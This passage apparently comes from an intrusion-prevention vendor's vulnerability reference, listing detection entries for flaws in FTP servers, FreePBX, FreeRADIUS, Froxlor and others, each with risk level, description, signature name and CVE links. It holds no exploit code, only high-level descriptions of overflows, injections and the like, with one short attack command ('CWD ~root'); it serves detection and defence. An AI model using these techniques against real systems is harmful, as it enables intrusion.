Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Freefloat FTP Server. The vulnerability is due to a boundary error when handling invalid FTP commands. Remote attackers could exploit this vulnerability by sending an overly long invalid FTP commands to the target. Successful exploits could lead to injection and execution of arbitrary code on the vulnerable server.
Situation: FTP_Command-Syntax-Incorrect
FTP_Oversized-Username
FTP_Oversized-Pathname
References:
BID-48704
http://www.securityfocus.com/bid/48704
BID-49265
http://www.securityfocus.com/bid/49265
Back to top

Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow

About this vulnerability: A Freeftpd Key Exchange Algorithm String Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FreeFTPd
Type: Buffer Overflow
Description: A buffer overflow vulnerability in FreeFTPd, version 1.0.10, which allows remote attackers to execute arbitrary code via a long key exchange algorithm string.
Situation: SSH_Freeftpd-Key-Exchange-Algorithm-String-Buffer-Overflow
References:
CVE-2006-2407
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2407
BID-17958
http://www.securityfocus.com/bid/17958
OSVDB-25569
http://www.osvdb.org/25569
Back to top

Freeftpd-User-Name-Buffer-Overflow

About this vulnerability: A vulnerability in FreeFTPD Project FreeFTPD
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeFTPd
Type: Malfunction
Description: A buffer overflow vulnerability exists in the FreeFTPD product. The affected product does not verify the length of the user supplied FTP command arguments. A malicious user can supply an overly long user name argument during the login procedure to exploit the flaw. Exploitation of this flaw may result in the divertion of the process flow of the vulnerable process. An attack may result in either a denial of service condition of the affected service or diversion of the process flow of the affected process. In the case of a successful code execution attack, the affected process will be diverted to attacker supplied code which is injected during the attack. It is most probable that the affected server will stop to function as intended after having been compromised. If a code execution attack is not successful, then only a denial of service condition will result. In the case of a denial of service attack, the affected process will terminate and will have to be manually restarted in order to restore functionality.
Situation: FTP_CS-Freeftpd-User-Name-Buffer-Overflow
References:
CVE-2005-3683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683
BID-15457
http://www.securityfocus.com/bid/15457
OSVDB-20909
http://www.osvdb.org/20909
Back to top

FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution

About this vulnerability: A vulnerability in FreePBX Project FreePBX
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Input Validation
Description: A code execution vulnerability exists in FreePBX. The vulnerability is due to an input validation issue in the index.php file of the recordings directory. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the page. Successful exploitation could lead to arbitrary code execution on the server under the security context of the web server.
Situation: HTTP_CSH-FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution
References:
CVE-2014-7235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7235
BID-70188
http://www.securityfocus.com/bid/70188
OSVDB-112437
http://www.osvdb.org/112437
Back to top

FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal

About this vulnerability: A vulnerability in FreePBX Project hotelwakeup Module
Risk: Moderate
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Directory Traversal
Description: Improper validation of user input in the hotelwakeup module of FreePBX causes a directory traversal vulnerability. A successful exploitation allows an attacker to run arbitrary code with the privileges of the user running the daemon.
Situation: HTTP_CRL-FreePBX-Framework-Hotelwakeup-Module-Directory-Traversal
Back to top

FreePBX-Framework-Module-Config.php-Code-Execution

About this vulnerability: A vulnerability in FreePBX Project FreePBX
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Input Validation
Description: A code execution vulnerability exists in FreePBX. The vulnerability is due to an error in admin/config.php, the main interface to FreePBX. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system with the privileges of FreePBX.
Situation: HTTP_CRL-FreePBX-Framework-Module-Config.php-Code-Execution
References:
CVE-2014-1903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1903
OSVDB-103240
http://www.osvdb.org/103240
Back to top

FreePBX-Framework-Modulefunctions-Display-SQL-Injection

About this vulnerability: A vulnerability in FreePBX Project FreePBX
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Input Validation
Description: Improper validation of HTTP requests causes an SQL injection vulnerability in FreePBX. A successful exploitation can allow an attacker to run arbitrary code on the target system.
Situation: HTTP_CRL-FreePBX-Framework-Modulefunctions-Display-SQL-Injection
Back to top

FreePBX-Framework-Recordings-Module-Remote-Command-Execution

About this vulnerability: A vulnerability in FreePBX
Risk: Moderate
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Input Validation
Description: A vulnerability in FreePBX
Situation: HTTP_CRL-FreePBX-Framework-Recordings-Module-Remote-Command-Execution
Back to top

FreePBX-Recording-Interface-File-Upload-Code-Execution

About this vulnerability: A vulnerability in FreePBX
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Directory Traversal
Description: A code execution vulnerability exists in FreePBX software. The vulnerability is due to a design error in the system recordings interface while handling uploaded files. The software does not properly check the file type being uploaded as well as the user extension (phone number) that can be manipulated to trigger directory traversal. This can be exploited by remote attackers to upload malicious files at arbitrary locations and execute arbitrary code with the privileges of the user running Apache web server (normally asterisk).
Situation: HTTP_CS-FreePBX-Recording-Interface-File-Upload-Code-Execution
References:
CVE-2010-3490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3490
BID-43454
http://www.securityfocus.com/bid/43454
Back to top

FreePBX-Remote-Command-Execution

About this vulnerability: A FreePBX Remote Command Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Input Validation
Description: An input validation vulnerability in FreePBX, versions 2.9.0 and 2.10.0, in the callme_startcall function in recordings/misc/callme_page.php, which allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.
Situation: HTTP_CSU_FreePBX-Remote-Command-Execution
References:
CVE-2012-4869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4869
BID-52630
http://www.securityfocus.com/bid/52630
OSVDB-80544
http://www.osvdb.org/80544
Back to top

FreePBX-Remotemod-Remote-Command-Execution

About this vulnerability: A vulnerability in FreePBX
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreePBX
Type: Input Validation
Description: A vulnerability in FreePBX
Situation: HTTP_CRL-FreePBX-Remotemod-Remote-Command-Execution
Back to top

FreeRADIUS-Access-Request-Denial-Of-Service

About this vulnerability: A denial of server vulnerability in FreeRADIUS Project RADIUS Server
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeRADIUS
Type: Input Validation
Description: There is a denial of service vulnerability in FreeRADIUS server. The vulnerability is due to an error when processing crafted access request packets.
Situation: Generic_UDP-FreeRADIUS-Access-Request-Denial-Of-Service
References:
CVE-2009-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111
BID-36263
http://www.securityfocus.com/bid/36263
Back to top

FreeRADIUS-Ascend-Send-Receive-Secret-DoS

About this vulnerability: A vulnerability in FreeRADIUS
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeRADIUS
Type: Malfunction
Description: A vulnerability exists in the way the FreeRADIUS software package handles out of sequence messages. When a RADIUS authentication or accounting request is sent out-of-order to a vulnerable FreeRADIUS, a memory exception occurs. This vulnerability may be leveraged by a remote attacker to deny service to the FreeRADIUS server.
Situation: Generic_UDP-FreeRADIUS-Ascend-Send-Receive-Secret-DoS
Back to top

FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in FreeRADIUS Server Project FreeRADIUS
Risk: Moderate
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeRADIUS
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been identified in FreeRADIUS. The vulnerability is due to an error in the certificate verification function when using TLS-based EAP. The application copies a time stamp into a stack buffer without sufficient validation. A remote attacker could exploit this vulnerability by supplying the server with a specially crafted certificate. Successful exploitation could result in arbitrary code execution in the context of the affected application.
Situation: Generic_UDP-FreeRADIUS-Client-Certificate-Verification-Stack-Buffer-Overflow
References:
CVE-2012-3547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3547
BID-55483
http://www.securityfocus.com/bid/55483
OSVDB-85325
http://www.osvdb.org/85325
Back to top

FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in FreeRADIUS Server Project FreeRADIUS
Risk: Moderate
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeRADIUS
Type: Buffer Overflow
Description: Improper handling of the continuation flag in WiMAX attributes causes a buffer overflow vulnerability in FreeRADIUS. A successful attack allows an attacker to run arbitrary code on the target system.
Situation: Generic_UDP-FreeRADIUS-Data2vp_Wimax-Heap-Buffer-Overflow
References:
CVE-2017-10984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10984
Back to top

FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in FreeRADIUS Server Project FreeRADIUS
Risk: Moderate
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeRADIUS
Type: Integer Overflow
Description: Improper parsing of DHCP messages causes an out of bounds read in FreeRADIUS. This can be used to exploit an integer underflow vulnerability, which may result in the radius process terminating.
Situation: BOOTP_CS-FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read
References:
CVE-2017-10986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10986
Back to top

FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in FreeRADIUS Server Project FreeRADIUS
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeRADIUS
Type: Malfunction
Description: Improper handling of WiMAX attribute lengths causes a buffer overflow vulnerability in FreeRADIUS. A successful attack allows an attacker to run arbitrary code on the target system.
Situation: Generic_UDP-FreeRADIUS-Rad_Coalesce-Out-Of-Bounds-Read
References:
CVE-2017-10979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10979
Back to top

FreeSWITCH-Event-Socket-Command-Execution

About this vulnerability: A vulnerability in FreeSWITCH
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FreeSWITCH
Type: Input Validation
Description: There exists a vulnerability in FreeSWITCH, multiple versions, which allows remote attackers to execute system commands by using the "system" API command, due to insufficient user input validation.
Situation: Generic_CS-FreeSWITCH-Event-Socket-Command-Execution
Back to top

Freetype-Heap-Buffer-Overflow-CVE-2020-15999

About this vulnerability: A vulnerability in Freetype font rendering library
Risk: High
First detected in: sgpkg-ips-1290-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Chrome
Type: Input Validation
Description: A heap buffer overflow vulnerability exists in the FreeType font rendering library.
Situation: File-Binary_Freetype-Heap-Buffer-Overflow-CVE-2020-15999
File-Text_Freetype-Heap-Buffer-Overflow-CVE-2020-15999
References:
CVE-2020-15999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999
Back to top

FrontPage-Fp30reg-DLL-BOF-MS03-051

About this vulnerability: Fp30reg.dll MS03-051 buffer overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS; FrontPage Server Extensions 2000; FrontPage Server Extensions 2002
Type: Buffer Overflow
Description: Microsoft FrontPage Server Extensions have a buffer overflow in fp30reg.dll library. This can be remote exploited via specific http request. There are working exploits publicly available.
Situation: HTTP_CS-IIS-Fp-BOF-MS03-051
References:
CVE-2003-0822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0822
BID-9007
http://www.securityfocus.com/bid/9007
MS03-051
http://technet.microsoft.com/security/bulletin/MS03-051
Back to top

Froxlor-Log-Path-RCE

About this vulnerability: A vulnerability in Froxlor.
Risk: High
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1567-5242
Platform: Unix; Linux
Software: Froxlor
Type: Input Validation
Description: A vulnerability in Froxlor, versions v2.0.7 and prior, which allows remote attackers to change the application logs path to any directory on the OS, allowing the writing and execution of malicious twig templates.
Situation: HTTP_CS-Froxlor-Log-Path-RCE
HTTP_CRL-Froxlor-Log-Path-RCE
References:
CVE-2023-0315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0315
Back to top

Froxlor-Simexporter.php-Import-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Froxlor
Risk: Moderate
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Platform: Generic
Software: Froxlor
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported in Froxlor. The vulnerability is due to incorrect image filename validation in SImExporter.php. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution under froxlorlocal account privileges.
Situation: File-Text_Froxlor-Simexporter.php-Import-Unrestricted-File-Upload
References:
CVE-2023-2034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2034
Back to top

FTP-3Com-3CDaemon-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the 3Com 3CDaemon FTP Server
Risk: High
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 3Com 3CDaemon
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the 3Com 3CDaemon. When an oversized username is given with the USER command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.
Situation: FTP_CS-Oversized-User-Buffer-Overflow
References:
CVE-2005-0277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0277
BID-12155
http://www.securityfocus.com/bid/12155
Back to top

FTP-Ability-Server-Stor-BOF

About this vulnerability: Buffer overflow in Ability FTP server
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ability FTP Server
Type: Buffer Overflow
Description: Code-Crafters Ability Server 2.3.4 has a buffer overflow vulnerability in the handling of STOR commands. By sending a STOR command with a long argument, a remote attacker can overflow a buffer and execute arbitrary code on the host.
Situation: FTP_CS-Ability-Server-Stor-BOF
References:
CVE-2004-1626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1626
BID-11508
http://www.securityfocus.com/bid/11508
OSVDB-11030
http://www.osvdb.org/11030
Back to top

FTP-Administrator-Login-Failure

About this vulnerability: Failed administrator FTP login attempt detected
Risk: Low
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic FTP server
Type: Failed Login
Description: A failed attempt to login as an administrator user was detected. Multiple attempts may indicate that there is a brute force attack against the administrator account in progress.
Situation: FTP_SS-Administrator-Login-Failure
Back to top

FTP-AIX-Ftpd-BOF-Libc

About this vulnerability: Aix Ftpd BOF Libc
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: AIX ftpd
Type: Buffer Overflow
Description: Aix ftpd libc buffer overflow vulnerability.
Situation: FTP_CS-AIX-Ftpd-BO-Libc
FTP_CS-AIX-BO-Libc-2
References:
CVE-1999-0789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0789
BID-679
http://www.securityfocus.com/bid/679
OSVDB-9
http://www.osvdb.org/9
Back to top

FTP-Anonymous-Login-Attempt

About this vulnerability: Anonymous FTP login attempt detected
Risk: Low
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic FTP server
Type: Insecure Configuration
Description: By default, many FTP servers enable anonymous FTP logins. Users logging in anonymously do not need an account on the server, and no passwords are required. The login name for anonymous logins is usually 'anonymous' or 'ftp', and the users are asked to use their email address as the password. FTP servers allowing anonymous logins can be security risks, depending on the location of the servers and the company policy.
Situation: FTP_CS-Anonymous-Login-Attempt
Back to top

FTP-Bin-Ls-BOF

About this vulnerability: Buffer overflow in bin/ls
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Generic FTP server
Type: Buffer Overflow
Description: /bin/ls can be crashed by specifying suitable command line options, which may result in a denial-of-service situation. This vulnerability can be exploited by remote attackers via applications that use ls, for example WU-FTPD.
Situation: FTP_CS-Bin-Ls-BOF
References:
CVE-2003-0853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853
BID-8875
http://www.securityfocus.com/bid/8875
Back to top

FTP-BOF-ProFTPD-WU-FTPD

About this vulnerability: Buffer Overflow in ProFTPD and WU-FTPD
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: ProFTPD; WU-FTPD; BeroFTPD
Type: Buffer Overflow
Description: Buffer overflow in ProFTPD and WU-FTPD allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
Situation: FTP_CS-BOF-ProFTPD-Pro
FTP_CS-BOF-ProFTPD-2
FTP_CS-BOF-ProFTPD-3
FTP_CS-Cd-BOF-Linux-Mkd
FTP_CS-BOF-Mkd-5
FTP_CS-BOF-Mkd-6
FTP_CS-BOF-Cwd
References:
CVE-1999-0911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0911
BID-612
http://www.securityfocus.com/bid/612
OSVDB-144
http://www.osvdb.org/144
Back to top

FTP-Bounce-Attack

About this vulnerability: FTP bounce attack
Risk: Moderate
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic FTP server
Type: Insecure Configuration
Description: In the FTP bounce attack, the attacker exploits the FTP protocol by using the PORT command to request access to ports or host not directly available for the attacker. This way the attacker uses the FTP server as a proxy. This technique can be used to port scan hosts, and to access hosts that the attacker cannot access through a direct connection.
Situation: FTP_PORT-IP-Address-Mismatch
FTP_PORT-IP-Address-Mismatch-Success
References:
CVE-1999-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0017
BID-126
http://www.securityfocus.com/bid/126
Back to top

FTP-BSD-Ftpd-Directory-Name-Buffer-Overflow

About this vulnerability: Buffer overflow in the directory name handling within NetBSD's FTP server
Risk: Moderate
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: NetBSD
Software: BSD ftpd
Type: Input Validation
Description: NetBSD's FTP server implementation contains buffer overflow vulnerability in directory name handling.
Situation: FTP_CS-BSD-Ftpd-Directory-Name-Buffer-Overflow
References:
CVE-2006-6652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6652
BID-21377
http://www.securityfocus.com/bid/21377
OSVDB-31781
http://www.osvdb.org/31781
Back to top

FTP-BSD-Ftpd-Glob-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in BSD-based FTP servers
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: BSD ftpd
Type: Buffer Overflow
Description: Multiple BSD-based FTP servers have a buffer overflow vulnerability in the parsing of user-supplied data. A remote attacker can exploit this vulnerability using metacharacters in path/file names which are then expanded by the glob() function in the server. A successfull exploit will give a root access to the target host.
Situation: FTP_CS-FreeBSD-BOF-Glob
FTP_CS-FreeBSD-BOF-Glob-2
FTP_CS-FreeBSD-BOF-Glob-3
References:
CVE-2001-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0247
BID-2548
http://www.securityfocus.com/bid/2548
Back to top

FTP-Cisco-Mkd-Buffer-Overflow

About this vulnerability: Buffer Overflow in Cisco IOS FTP daemon
Risk: High
First detected in: sgpkg-ips-168-2032
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: <os>
Type: Buffer Overflow
Description: A remotely exploitable buffer overflow exists in Cisco IOS FTP server.
Situation: FTP_CS-Cisco-IOS-FTP-Mkd-BOF
FTP_CS-Cisco-IOS-FTP-Mkd-BOF-2
References:
CVE-2007-2586
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2586
BID-23885
http://www.securityfocus.com/bid/23885
OSVDB-35334
http://www.osvdb.org/35334
Back to top

FTP-Crob-RMD-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Crob FTP server
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Crob FTP Server
Type: Buffer Overflow
Description: Crob FTP Server contains a buffer overflow vulnerability in then handling of RMD command. Remote attackers can exploit this vulnerability by sending an arbitrary FTP command with long parameter followed with RMD command with very a long parameter value. With successful exploit attacker can compromise the system that runs the Crob FTP Server.
Situation: FTP_CS-Crob-RMD-Command-Buffer-Overflow
References:
CVE-2005-1873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1873
BID-13847
http://www.securityfocus.com/bid/13847
Back to top

FTP-Curl-Client-Error-BOF

About this vulnerability: Curl Client Error Buffer Overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: curl ftp client
Type: Buffer Overflow
Description: The curl ftp client software has an error in the error message size handling which could be exploited by a server to gain a system compromise of the client machine.
Situation: FTP_SS-Curl-Client-Error-BOF
References:
CVE-2000-0973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0973
BID-1804
http://www.securityfocus.com/bid/1804
Back to top

FTP-Cwd-Root-System-Compromise

About this vulnerability: CWD ~root command allows system compromise
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Generic FTP server
Type: Malfunction
Description: Very old versions of the FTP daemon allow unauthorized access by a "CWD ~root" command. This vulnerability can be exploited remotely to gain root permissions on the host.
Situation: FTP_CS-Cwd-Root-System-Compromise
References:
CVE-1999-0082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0082
Back to top

FTP-DreamFTP-Username-Format-String-System-Compromise

About this vulnerability: DreamFTP format string vulnerability in username
Risk: High
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DreamFTP
Type: Format String
Description: DreamFTP ftp server has a format string vulnerability in the handling of user names. The vulnerability allows remote attackers to execute arbitrary code on the system by sending a username that contains format string characters. No authentication is needed, as the server can be exploited before authentication.
Situation: FTP_CS-Suspicious-Format-String-Modifiers-In-FTP-Command
References:
CVE-2004-0277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0277
BID-9600
http://www.securityfocus.com/bid/9600
Back to top

FTP-Failed-Login

About this vulnerability: Failed FTP login
Risk: Low
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic FTP server
Type: Failed Login
Description: Failed FTP login attempt. If these failed attempts come in large numbers from a single host, a remote attacker may be trying to guess passwords via a brute-force method.
Situation: FTP_SS-Failed-Login
Back to top

FTP-File-Globbing-Generic

About this vulnerability: File Globbing Generic Vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: WU-FTPD
Type: Malfunction
Description: Multiple FTPD's suffer from a denial of service vulnerability related to the glob() function call, sometimes even a system compromise can be achieved.
Situation: FTP_CS-File-Globbing-Attack
References:
CVE-2001-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0550
BID-3581
http://www.securityfocus.com/bid/3581
OSVDB-686
http://www.osvdb.org/686
Back to top

FTP-FileCOPA-List-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of the LIST command in FileCOPA FTP Server
Risk: Moderate
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FileCOPA FTP Server
Type: Buffer Overflow
Description: FileCOPA FTP Server has a buffer overflow vulnerability in the handling of the LIST command. A successful exploitation of this vulnerability allows an authenticated remote attacker to cause a DoS or to compromise a vulnerable system.
Situation: FTP_CS-FileCOPA-List-Command-Buffer-Overflow
References:
CVE-2006-3726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3726
BID-19065
http://www.securityfocus.com/bid/19065
OSVDB-27389
http://www.osvdb.org/27389
Back to top

FTP-Hd-Soft-Windows-FTP-Server-Format-Strings

About this vulnerability: Format string vulnerability in HD Soft's Windows FTP Server.
Risk: Moderate
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HD Soft's Windows FTP Server
Type: Format String
Description: HD Soft's Windows FTP Server suffers from a format string vulnerability. Remote attackers can exploit the vulnerability to execute arbitrary code on the host by sending a crafted string as the login name.
Situation: FTP_CS-Hd-Soft-Windows-FTP-Server-Format-Strings
References:
CVE-2004-0069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0069
BID-9385
http://www.securityfocus.com/bid/9385
Back to top

FTP-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Internet Explorer. By persuading a target user to visit a malicious web page, a remote attacker may execute arbitrary code on the target host with the privileges of the currently logged in user.
Situation: FTP_SS-Microsoft-Internet-Explorer-FTP-Response-Parsing-Memory-Corruption
References:
CVE-2007-0217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0217
BID-22489
http://www.securityfocus.com/bid/22489
OSVDB-31892
http://www.osvdb.org/31892
MS07-016
http://technet.microsoft.com/security/bulletin/MS07-016
Back to top

FTP-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow

About this vulnerability: Buffer overflow in the status command parameter handling within Microsoft Windows FTP service
Risk: Moderate
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: The FTP service implementation shipped with various versions of Microsoft Windows contains a buffer overflow vulnerability in the metacharacter handling in status command parameters.
Situation: FTP_CS-Microsoft-Windows-FTP-Service-Status-Command-Buffer-Overflow
References:
CVE-2002-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0073
BID-4482
http://www.securityfocus.com/bid/4482
OSVDB-3328
http://www.osvdb.org/3328
MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018
Back to top

FTP-Palmetto-BOF

About this vulnerability: Palmetto buffer overflows in WU-FTPD and proftpd
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WU-FTPD; ProFTPD
Type: Buffer Overflow
Description: Remote exploitable buffer overflows in WU-FTPD and ProFTPD. Exploitation requires write access to the system. Such is often found within "incoming" directory. Successful exploit leads to remote root compromise
Situation: FTP_CS-WU-FTPD-ProFTPD-Palmetto-BOF
FTP_CS-WU-FTPD-Palmetto-BOF-Ftpwarez
FTP_CS-WU-FTPD-Palmetto-BOF-Wh0a
FTP_CS-WU-FTPD-Palmetto-BOF-W00f
FTP_CS-WU-FTPD-Palmetto-BOF-Duke
FTP_CS-WU-FTPD-Palmetto-BOF-Bulba
FTP_CS-WU-FTPD-Palmetto-BOF-Wu30
FTP_CS-WU-FTPD-Palmetto-BOF-Admwuftpd
References:
CVE-1999-0368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0368
Back to top

FTP-ProFTPD-Input-Validation-DoS

About this vulnerability: ProFTPD Input Validation Denial of Service
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: ProFTPD
Type: Malfunction
Description: By using crafted STAT commands it is possible to cause ProFTPD from responding to requets - this might result in a denial of service condition.
Situation: FTP_CS-ProFTPD-DoS-Stat
References:
BID-6341
http://www.securityfocus.com/bid/6341
Back to top

FTP-ProFTPD-Snprintf

About this vulnerability: ProFTPD snprintf call vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: ProFTPD
Type: Format String
Description: ProFTPD (<= pre6) passes user commands to snprinft() enabling a root shell to an attacker.
Situation: FTP_CS-ProFTPD-Snprintf
Back to top

FTP-ProFTPD-User-SQL-Injection

About this vulnerability: ProFTPD SQL injection vulnerability allows unauthorized login
Risk: High
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: ProFTPD
Type: SQL Injection
